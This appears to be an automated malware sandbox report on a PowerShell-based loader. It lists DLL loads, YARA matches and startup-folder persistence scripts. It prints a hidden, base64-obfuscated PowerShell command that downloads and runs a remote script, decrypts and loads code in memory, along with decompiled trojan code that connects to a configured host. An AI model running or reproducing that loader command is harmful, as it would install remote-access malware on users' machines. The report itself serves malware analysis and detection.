Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: logoncontroller.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: slc.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: dwmapi.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: logoncontroller.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: slc.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: dwmapi.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: winsta.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: apphelp.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dwmredir.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: udwm.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dxgi.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dwmcore.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dwmcore.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dcomp.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dxgi.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: d2d1.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dcomp.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: d3d11.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: d3dcompiler_47.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dwmghost.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dwmapi.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: avrt.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: ism.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: hid.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: ninput.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: windowmanagementapi.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: windowscodecs.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: gameinput.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: windows.gaming.input.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: uianimation.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dispbroker.desktop.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: mscms.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: coloradapterclient.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: actxprxy.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dispbroker.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: windows.graphics.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

                Data Obfuscation

                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat", "1", "true");
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, Messages.cs.Net Code: Memory
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, Messages.cs.Net Code: Memory
                Source: 5.2.powershell.exe.1d3130bafb0.5.raw.unpack, tcsnk.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, Messages.cs.Net Code: Memory
                Source: 5.2.powershell.exe.1d3130b0098.1.raw.unpack, tcsnk.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Source: 5.2.powershell.exe.1d31326fc88.4.raw.unpack, tcsnk.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Source: 5.2.powershell.exe.1d3130da550.6.raw.unpack, tcsnk.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Source: 5.2.powershell.exe.1d3130d3740.2.raw.unpack, tcsnk.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, Messages.cs.Net Code: Memory
                Source: 11.2.powershell.exe.1d7ce1adde0.11.raw.unpack, tcsnk.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Source: 11.2.powershell.exe.1d7cdfeefc8.0.raw.unpack, tcsnk.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, Messages.cs.Net Code: Memory
                Source: 11.2.powershell.exe.1d7ce012688.10.raw.unpack, tcsnk.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, Messages.cs.Net Code: Memory
                Source: 11.2.powershell.exe.1d7ce019498.1.raw.unpack, tcsnk.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDb
i5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B8B4B22 push eax; iretd 5_2_00007FFD9B8B4BB1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B8A792B push ebx; retf 5_2_00007FFD9B8A796A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B976B43 push edi; iretd 5_2_00007FFD9B976DC6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B9771C9 push ecx; retf 5_2_00007FFD9B9771CC
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B9755E5 push edi; retf 5_2_00007FFD9B9755E6

                Boot Survival

                Source: Yara matchFile source: 5.2.powershell.exe.1d3133b65d0.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa26a4b0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc0714a0b0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601de4450.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008ed970.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07141480.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa248728.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07127e40.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008f65a0.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601dfa830.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601dfa830.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2d5060.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccde7168.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601de4450.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7e4bb0000.16.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2eb440.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa261880.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008f65a0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccdde538.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008ed970.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa248728.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133ad9a0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2eb440.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7e4bb0000.16.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133975c0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07127e40.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.00000206008C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2325412269.000001D313377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CE2B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CE2E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1969459274.000001D7E4BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2248750195.000002CC070F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CCDB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2720, type: MEMORYSTR
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmd
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0c891e71.cmd
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a276d6c0.cmd
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_79ced6d4.cmd
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c64e66cc.cmd
